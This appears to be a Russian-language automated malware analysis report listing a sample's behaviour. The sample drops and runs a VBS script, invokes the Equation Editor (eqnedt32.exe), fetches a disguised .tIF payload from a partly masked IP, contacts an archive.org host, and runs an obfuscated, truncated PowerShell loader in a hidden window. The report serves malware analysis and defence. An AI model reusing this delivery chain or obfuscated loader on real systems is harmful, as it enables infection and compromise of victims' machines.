Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\weneedgoodcakewithbuttermilksw.vBS"
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\weneedgoodcakewithbuttermilksw.vbs
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\i3nmat9z\config14[1].txt
Сетевая активность
Подключается к
- '19#.#2.81.225':80
- 'ia#####4.us.archive.org':443
TCP
Запросы HTTP GET
- http://19#.#2.81.225/xampp/KNR/weneedgoodcakewithbuttermilksweet.tIF
Другие
- 'ia#####4.us.archive.org':443
UDP
- DNS ASK ia#####4.us.archive.org
Другое
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J⥼ ⫣ ᭣ ₊ ⤪Bp⥼ ⫣ ᭣ ₊ ⤪G0⥼ ⫣ ᭣ ₊ ⤪YQBn⥼ ⫣ ᭣ ₊ ⤪GU⥼ ⫣ ᭣ ₊ ⤪VQBy⥼ ⫣ ᭣ ₊ ⤪Gw⥼ ⫣ ᭣ ₊ ⤪I⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪9⥼ ⫣ ᭣ ₊ ⤪C⥼ ⫣ ᭣ ₊ ⤪⥼ ⫣ ᭣ ₊ ⤪JwBo⥼ ⫣ ᭣ ₊ ⤪HQ⥼ ⫣ ᭣ ₊ ⤪d⥼ ⫣ ᭣ ₊ ⤪Bw⥼ ⫣ ᭣ ₊ ⤪... (со скрытым окном)
